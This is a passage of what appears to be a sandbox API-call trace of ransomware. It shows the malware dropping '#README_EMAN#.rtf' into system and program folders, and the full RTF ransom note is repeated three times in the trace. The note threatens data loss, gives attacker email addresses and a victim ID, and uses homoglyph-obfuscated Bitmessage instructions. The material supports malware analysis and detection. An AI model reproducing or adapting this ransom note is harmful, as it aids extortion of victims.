(x86)\\google\\chrome\\application\\58.0.3029.110\\#readme_eman#.rtf")) returned 0x20 [0271.258] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\#readme_eman#.rtf")) returned 0x20 [0271.258] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\#readme_eman#.rtf")) returned 0x20 [0271.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\#readme_eman#.rtf")) returned 0x20 [0271.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office 15\\ClientX64\\#README_EMAN#.rtf" (normalized: "c:\\program files\\microsoft office 15\\clientx64\\#readme_eman#.rtf")) returned 0x20 [0271.258] GetFileAttributesW (lpFileName="C:\\ProgramData\\USOShared\\Logs\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\usoshared\\logs\\#readme_eman#.rtf")) returned 0x20 [0271.259] GetFileAttributesW (lpFileName="C:\\Recovery\\WindowsRE\\#README_EMAN#.rtf" (normalized: "c:\\recovery\\windowsre\\#readme_eman#.rtf")) returned 0xffffffff [0271.259] GetLastError () returned 0x2 [0271.259] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\#README_EMAN#.rtf" (normalized: "c:\\recovery\\windowsre\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0271.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link 